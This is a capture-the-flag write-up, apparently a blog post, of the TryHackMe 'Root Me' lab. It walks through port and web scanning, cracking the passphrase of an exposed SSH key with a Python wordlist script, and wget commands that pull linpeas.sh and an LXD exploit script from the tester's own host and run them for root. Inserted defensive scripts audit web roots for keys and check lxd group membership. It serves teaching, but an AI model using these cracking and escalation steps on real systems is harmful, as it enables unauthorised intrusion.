CatSec.org

Root Me

In this post, we will look into the room “Root Me” from TryHackMe, which can be found on https://tryhackme.com

As usual, we start with port and service discovery using rustscan, or nmap directly if you prefer.

$ rustscan 10.10.117.105 --ulimit 5000

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
HACK THE PLANET

[~] Automatically increasing ulimit value to 5000.
Open 10.10.96.105:22
Open 10.10.96.105:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,80 10.10.117.105

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-31 15:37 CEST
Initiating Ping Scan at 15:37
Scanning 10.10.117.105 [2 ports]
Completed Ping Scan at 15:37, 0.42s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:37
Completed Parallel DNS resolution of 1 host. at 15:37, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 15:37
Scanning 10.10.117.105 [2 ports]
Discovered open port 80/tcp on 10.10.117.105
Discovered open port 22/tcp on 10.10.117.105
Completed Connect Scan at 15:37, 0.06s elapsed (2 total ports)
Nmap scan report for 10.10.117.105
Host is up, received syn-ack (0.34s latency).
Scanned at 2020-08-31 15:37:21 CEST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

Two interesting ports are open:

  • 22/tcp open ssh
  • 80/tcp open http

Let’s fire up nikto and see what kind of information disclosure we can get from it.

$ nikto -h 10.10.117.105

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.117.105
+ Target Hostname:    10.10.117.105
+ Target Port:        80
+ Start Time:         2020-08-31 15:46:03 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xaca 0x59e40b71bc7ab 
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ File/dir '/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-08-31 15:49:54 (GMT2) (231 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Hmm, robots.txt is often interesting.

$ curl http://10.10.117.105/robots.txt

user-agent: *
Allow: /
/uploads/

OK, for the moment we have 2 interesting directories to investigate:

  • /uploads
  • /secret

Let’s see if gobuster can give us more useful information (adding a search on some file extensions).

$ gobuster -w /usr/share/dirb/wordlists/common.txt -x php,html,txt,pdf -u 10.10.117.105

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.117.105/
[+] Threads      : 10
[+] Wordlist     : /usr/share/dirb/wordlists/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,html,txt,pdf
[+] Timeout      : 10s
=====================================================
2020/08/31 15:47:35 Starting gobuster
=====================================================
/about.php (Status: 200)
/about.html (Status: 200)
/index.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/secret (Status: 301)
/uploads (Status: 301)
=====================================================
2020/08/31 15:49:00 Finished
=====================================================

No more info. Good, let’s see what we can get from /secret and /uploads.

wget is our friend.

$ wget http://10.10.117.105/secret/secretKey

--2020-09-01 19:29:46--  http://10.10.117.105/secret/secretKey
Connecting to 10.10.117.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1766 (1,7K)
Saving to: ‘secretKey’

secretKey.1                                                 100%[==========================================================================================>]   1,72K  --.-KB/s    in 0s      

2020-09-01 19:29:46 (139 MB/s) - ‘secretKey’ saved [1766/1766]

OK, we have an encrypted RSA private key; we should try to make an SSH connection with it.

$ cat secretKey

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

...
-----END RSA PRIVATE KEY-----

$ wget http://10.10.117.105/uploads/dict.lst

--2020-09-01 19:33:56--  http://10.10.117.105/uploads/dict.lst
Connecting to 10.10.117.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2006 (2,0K)
Saving to: ‘dict.lst’

dict.lst.1                                                  100%[==========================================================================================>]   1,96K  --.-KB/s    in 0s      

2020-09-01 19:33:56 (144 MB/s) - ‘dict.lst’ saved [2006/2006]

$ tail -10 dict.lst

1qaz2wsx
dragon
master
monkey
letmein
login
princess
solo
qwertyuiop
starwars

$ wc -l dict.lst

222 dict.lst

OK, we have a secret key and we have a dict file, but we are still missing a user name.

Let’s continue the recon on the web pages and look at the page source of each one.

In the source of the index page we can see a comment asking user john to add some actual content to the site.

Let’s test this user with the key we found.

$ ssh -i secretKey john@10.10.117.105 

The authenticity of host '10.10.117.105 (10.10.117.105)' can't be established.
ECDSA key fingerprint is SHA256:LO5bYqjXqLnB39jxUzFMiOaZ1YnyFGGXUmf1edL6R9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.117.105' (ECDSA) to the list of known hosts.
Enter passphrase for key 'secretKey': 

OK, the key is protected with a passphrase, and we found a dict file with a lot of candidate passwords. Let’s write a simple Python script to test every password from the dict file against the secret key.

$ cat crackRSAKey.py 


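import argparse
import sys

import paramiko

parser = argparse.ArgumentParser()
parser.add_argument('--key', '-k', help='The key file', required=True)
parser.add_argument('--wordlist', '-w', help='The wordlist file', required=True)
parser.add_argument('--verbose', '-v', action="store_true", help='Activate verbose mode', required=False)

args = parser.parse_args()

with open(args.wordlist, 'r') as w:
    for secret in w:
        secret = secret.strip()
        try:
            # Loading only succeeds when the passphrase decrypts the key
            paramiko.RSAKey.from_private_key_file(args.key, secret)
        except Exception:
            # Wrong passphrase: the key cannot be decrypted or parsed.
            # (A bare "except:" would also swallow the SystemExit raised on
            # success, so the loop would never stop.)
            if args.verbose:
                print(f'✗ -> {secret}')
            continue
        print(f'✓ -> {secret}')
        sys.exit(0)

# No entry of the wordlist matched
sys.exit(1)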

Test time

$ python3 crackRSAKey.py --wordlist dict.lst --key secretKey

✓ -> ...ThePassPhrase...

Perfect, we have our passphrase.
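The quick result owes as much to the key format as to the wordlist: a `Proc-Type: 4,ENCRYPTED` header marks legacy OpenSSL PEM encryption, which derives the AES key from the passphrase with a single MD5 iteration. As an added example (not part of the original write-up), this defender-side audit walks a web root and reports every private key being served and how it is protected; the function names and the sample key are constructed for illustration.

```python
import base64, os, re, struct

PEM_RE = re.compile(r"-----BEGIN ([A-Z0-9 ]*PRIVATE KEY)-----\r?\n(.*?)-----END \1-----", re.S)
OPENSSH_MAGIC = b"openssh-key-v1\x00"

def _ssh_string(buf, off):
    """Read one length-prefixed string from an OpenSSH key blob."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n].decode("ascii", "replace"), off + 4 + n

def classify_private_key(text):
    """Return (label, protection, detail) for the first private key, else None."""
    m = PEM_RE.search(text)
    if not m:
        return None
    label, body = m.group(1), m.group(2)
    # Legacy PEM puts "Name: value" headers before the base64 payload.
    headers = dict(re.findall(r"^([A-Za-z-]+): *(\S.*?)\s*$", body, re.M))
    if "ENCRYPTED" in headers.get("Proc-Type", ""):
        cipher = headers.get("DEK-Info", "?").split(",")[0]
        return label, "legacy-pem", cipher + ", MD5 key derivation, 1 iteration"
    if label == "ENCRYPTED PRIVATE KEY":
        return label, "pkcs8", "KDF parameters are inside the ASN.1 payload"
    if label == "OPENSSH PRIVATE KEY":
        try:
            raw = base64.b64decode("".join(body.split()))
            if not raw.startswith(OPENSSH_MAGIC):
                raise ValueError("bad magic")
            cipher, off = _ssh_string(raw, len(OPENSSH_MAGIC))
            kdf, _ = _ssh_string(raw, off)
        except (ValueError, struct.error):
            return label, "unparsed", "not a valid openssh-key-v1 blob"
        if cipher != "none":
            return label, "openssh", cipher + " with " + kdf + " KDF"
    return label, "none", "no passphrase"

def audit_webroot(root):
    """Walk a served directory and report every file holding a private key."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    result = classify_private_key(fh.read(65536))
            except OSError:
                continue
            if result:
                findings.append((os.path.relpath(path, root),) + result)
    return findings

# Constructed sample: same header layout as the key above, placeholder payload.
SAMPLE_LEGACY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

Q09OU1RSVUNURUQ=
-----END RSA PRIVATE KEY-----
"""
```

Any hit from `audit_webroot` on a document root is a finding whatever the protection level: the key should be removed from the served tree and rotated.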

$ ssh -i secretKey john@10.10.117.105

Enter passphrase for key 'secretKey': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Sep  1 17:38:52 UTC 2020

  System load:  0.0               Processes:           96
  Usage of /:   41.1% of 9.78GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 10.10.117.105
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ 

Now we are in as john

john@exploitable:~$ ll
total 60
drwxr-xr-x 8 john john  4096 Jul 27 20:24 ./
drwxr-xr-x 3 root root  4096 Feb  5  2020 ../
lrwxrwxrwx 1 john john     9 Jul 27 20:24 .bash_history -> /dev/null
-rw-r--r-- 1 john john   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 john john  3771 Apr  4  2018 .bashrc
drwx------ 2 john john  4096 Feb  5  2020 .cache/
drwxr-x--- 3 john john  4096 Jul 27 20:15 .config/
drwx------ 3 john john  4096 Feb  5  2020 .gnupg/
drwxrwxr-x 3 john john  4096 Jul 27 20:13 .local/
-rw-r--r-- 1 john john   807 Apr  4  2018 .profile
drwx------ 2 john john  4096 Feb  5  2020 .ssh/
-rw-r--r-- 1 john john     0 Feb  5  2020 .sudo_as_admin_successful
drwxr-xr-x 2 root root  4096 Feb  5  2020 .vim/
-rw------- 1 root root 12070 Jul 27 20:21 .viminfo
-rw-rw-r-- 1 john john    33 Feb  5  2020 user.txt
john@exploitable:~$ cat user.txt 
a5c...................e7e

Boom, we get the user flag. Let’s check how we can escalate privileges from john.

To speed up the process, I will upload linpeas.sh to the machine and fire it up, but first I have to get my VPN IP.

$ ip a s tun0 

9: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
    link/none 
    inet 10.9.xx.yy/16 brd 10.9.255.255 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::9657:275d:8291:9277/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever

  • On my machine

$ ll linpeas.sh
  rwxr-xr-x  1  501  dialout   237 KiB  Tue Sep  1 07:48:17 2020    linpeas.sh 

$ python -m  SimpleHTTPServer                               
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.117.105 - - [01/Sep/2020 19:42:25] "GET /linpeas.sh HTTP/1.1" 200 -

  • On Game Server machine

john@exploitable:~$ cd /dev/shm
john@exploitable:/dev/shm$ wget http://10.9.80.49:8000/linpeas.sh
--2020-09-01 17:42:25--  http://10.9.80.49:8000/linpeas.sh
Connecting to 10.9.80.49:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 243613 (238K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                                  100%[=========================================================================================>] 237.90K  1.35MB/s    in 0.2s    

2020-09-01 17:42:25 (1.35 MB/s) - ‘linpeas.sh’ saved [243613/243613]

john@exploitable:/dev/shm$ chmod u+x linpeas.sh 
john@exploitable:/dev/shm$ ll linpeas.sh 
-rwxrw-r-- 1 john john 243613 Sep  1 05:48 linpeas.sh*

Now we can fire up linpeas.sh and check the interesting parts of its output.

We are on an ubuntu-18.04.1 and john is a member of the lxd group: this is our privesc entry point (for more info you can read this article about LXD PrivEsc).
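Membership of the lxd group lets a user drive the LXD daemon, which runs as root, so it deserves the same review as sudo access. The following added example (not from the original write-up) lists the accounts that belong to such groups through either /etc/group or their primary GID in /etc/passwd; the group list beyond lxd, the function names and the sample data are assumptions.

```python
# Groups whose members can obtain root on the host. "lxd" is the one this
# write-up relies on; the others are an assumed policy list, adjust as needed.
ROOT_EQUIVALENT_GROUPS = frozenset({"lxd", "docker", "disk", "sudo"})


def _records(text, min_fields):
    """Yield split records from a colon-separated file, skipping junk lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) >= min_fields:
            yield parts


def risky_memberships(group_text, passwd_text, watched=ROOT_EQUIVALENT_GROUPS,
                      allowed=frozenset({"root"})):
    """Return {user: [groups]} for accounts that belong to a watched group.

    Covers supplementary membership (4th field of /etc/group) and primary
    membership (GID field of /etc/passwd), which the group file does not list.
    """
    gid_to_name, hits = {}, {}
    for name, _pw, gid, members in (r[:4] for r in _records(group_text, 4)):
        if name not in watched:
            continue
        gid_to_name[gid] = name
        for user in filter(None, (m.strip() for m in members.split(","))):
            hits.setdefault(user, set()).add(name)
    for rec in _records(passwd_text, 7):
        user, gid = rec[0], rec[3]
        if gid in gid_to_name:
            hits.setdefault(user, set()).add(gid_to_name[gid])
    return {u: sorted(g) for u, g in sorted(hits.items()) if u not in allowed}


# Constructed sample data modelled on the box in this write-up (IDs invented).
SAMPLE_GROUP = """\
root:x:0:
lxd:x:108:john
docker:x:998:deploy
www-data:x:33:
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:john:/home/john:/bin/bash
build:x:1001:108:CI account:/home/build:/bin/sh
"""

if __name__ == "__main__":
    for user, groups in risky_memberships(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        print(f"{user}: {', '.join(groups)}")
```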

Let’s do some Google searching.

OK, let’s dive into this exploit-db CVE.

OK, we have to follow those 4 steps to, perhaps, get the privesc we are looking for.

Let’s first copy the exploit script and save it on our machine as lxdExploit.sh.

$ vim lxdExploit.sh

$ tail -20 lxdExploit.sh
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi

  • Step 1: Download build-alpine (store it into your /tmp directory)

$ wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
--2020-09-01 19:52:41--  https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7498 (7,3K) [text/plain]
Saving to: ‘build-alpine.1’

build-alpine.1                                              100%[========================================================================================================================================>]   7,32K  --.-KB/s    in 0,002s  

2020-09-01 19:52:42 (4,15 MB/s) - ‘build-alpine’ saved [7498/7498]

  • Step 2: Build the container

Change the user to root and copy build-alpine into /tmp.

root@prime:/tmp# ./build-alpine 
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64
Downloading alpine-mirrors-3.5.10-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading alpine-keys-2.2-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.10.5-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://dl-8.alpinelinux.org/alpine/v3.12/main
fetch http://dl-8.alpinelinux.org/alpine/v3.12/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r9)
(2/19) Installing busybox (1.31.1-r19)
Executing busybox-1.31.1-r19.post-install
(3/19) Installing alpine-baselayout (3.2.0-r7)
Executing alpine-baselayout-3.2.0-r7.pre-install
Executing alpine-baselayout-3.2.0-r7.post-install
(4/19) Installing openrc (0.42.1-r11)
Executing openrc-0.42.1-r11.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r4)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r19)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r19)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r9)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
root@prime:/tmp# 

Great!

root@prime:/tmp# ll alpine-v3.12-x86_64-20200901_1955.tar.gz 
-rw-r--r-- 1 root root 3199601 sept.  1 19:55 alpine-v3.12-x86_64-20200901_1955.tar.gz

Now we have to upload the container and the lxdExploit.sh script to the Game Server machine.

  • On my machine

root@prime:/tmp# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.117.105 - - [01/Sep/2020 19:57:40] "GET /alpine-v3.12-x86_64-20200901_1955.tar.gz HTTP/1.1" 200 -
10.10.117.105 - - [01/Sep/2020 19:57:54] "GET /lxdExploit.sh HTTP/1.1" 200 -

  • On Game Server machine

john@exploitable:/dev/shm$ wget http://10.9.80.49:8000/alpine-v3.12-x86_64-20200901_1955.tar.gz
--2020-09-01 17:57:41--  http://10.9.80.49:8000/alpine-v3.12-x86_64-20200901_1955.tar.gz
Connecting to 10.9.80.49:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3199601 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200901_1955.tar.gz’

alpine-v3.12-x86_64-20200901_1955.tar.gz                    100%[=============================================================================>]   3.05M  2.01MB/s    in 1.5s    

2020-09-01 17:57:42 (2.01 MB/s) - ‘alpine-v3.12-x86_64-20200901_1955.tar.gz’ saved [3199601/3199601]

john@exploitable:/dev/shm$ wget http://10.9.80.49:8000/lxdExploit.sh
--2020-09-01 17:57:54--  http://10.9.80.49:8000/lxdExploit.sh
Connecting to 10.9.80.49:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1453 (1.4K) [text/x-sh]
Saving to: ‘lxdExploit.sh’

lxdExploit.sh                                               100%[=============================================================================>]   1.42K  --.-KB/s    in 0s      

2020-09-01 17:57:54 (248 MB/s) - ‘lxdExploit.sh’ saved [1453/1453]

john@exploitable:/dev/shm$ 

  • Starting the Attack

If the attack is successful, we have to move to /mnt/root in the container to see the host machine’s files and access them as root.

john@exploitable:/dev/shm$ chmod u+x lxdExploit.sh
john@exploitable:/dev/shm$ ./lxdExploit.sh -f alpine-v3.12-x86_64-20200901_1955.tar.gz 
Image imported with fingerprint: d05934f9f6d3ffe6d3a2e8e7ba814b64e4007b0d9f1e405a39bdb0365db65ca2
[*] Listing images...

+--------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE         |
+--------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| alpine | d05934f9f6d3 | no     | alpine v3.12 (20200901_19:55) | x86_64 | 3.05MB | Sep 1, 2020 at 5:59pm (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
Creating privesc
Device giveMeRoot added to privesc
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/root/
/mnt/root/root # ls -l
total 4
-rw-r--r--    1 root     root            33 Feb  5  2020 root.txt
/mnt/root/root # cat root.txt 
2e3..........................8fc

We are root and we can now get the root flag

/mnt/root/root # exit
[*] Removing container... [√]
john@exploitable:/dev/shm$